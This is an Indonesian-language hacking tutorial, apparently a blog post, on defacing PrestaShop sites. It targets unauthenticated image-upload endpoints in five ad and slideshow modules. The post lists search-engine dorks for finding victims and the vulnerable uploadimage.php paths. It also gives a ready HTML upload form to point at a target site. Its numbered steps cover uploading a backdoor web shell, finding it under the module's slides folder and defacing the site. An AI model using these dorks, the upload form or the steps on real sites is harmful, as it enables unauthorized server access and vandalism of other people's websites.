Deface Teknik Prestashop File Upload

Hallo Guys , Gua Mau Share Tutorial Untuk Deface Terbaru Nih , Maksudnya Tutorial Ini Saya Baru Tau :v

Dork : 

   Inurl:"/modules/columnadverts/"

   Inurl:"/modules/homepageadvertise/"

   Inurl:"/modules/productpageadverts/"

   Inurl:"/modules/simpleslideshow/"

   Inurl:"/modules/vtemslideshow/"

   Index Of "/modules/columnadverts/"

   Index Of "/modules/homepageadvertise/"

   Index Of "/modules/productpageadverts/"

   Index Of "/modules/simpleslideshow/"

   Index Of "/modules/vtemslideshow/"

Exploit

 http://loclahost/ modules/columnadverts/uploadimage.php

 http://localhost/ modules/homepageadvertise/uploadimage.php

 http://localhost/ modules/productpageadverts/uploadimage.php

 http://localhost/ modules/simpleslideshow/uploadimage.php

 http://localhost/ modules/vtemslideshow/uploadimage.php

CSRF : 

<form method="POST" action="http://localhost/modules/modules name/uploadimage.php"

enctype="multipart/form-data">

<input type="file" name="userfile" /><button>Upload</button>

</form>

Langsung Ke Tutorialnya.... :*

1. Cari Target Menggunakan Dork !

2. Pilih Salah Satu Situs Yang Ingin Di cRooTz   :v

3. Tambakan Exploit Setelah Url   :*

 http://localhost/ Exploitnya Pilih Satu Persatu !

Jika Vuln Tampilanya Akan Seperti Ini !

4. Copy CSRF Yang Ada Di Atas Tadi   :*

Jangan Lupa Edit Dulu CSRF Tersebut .

 Localhost   >  Website Target .

 Modules Name   >   Nama Exploit Yang Tadi Vuln .

Lalu Simpan Dengan Ex.HTML   > All Files

5. Buka CSRF Tersebut , Upload Shell Backdoor Kamu   :*

Jika Berhasil Akan Terlihat Seperti Ini

6. Dan Sekarang Lihat Letak Shell Nya

 http://localhost/modules/modules name/slides/Name_Shell.php

Kalau Sudah Ketemu Shellnya , Terserah Deh , Mau Deface Apanya Aja Bebas :*

Lihat Tutorial Lebih Lengkap Di Video Ini >   http://adf.ly/1bryrH

Terima Kasih!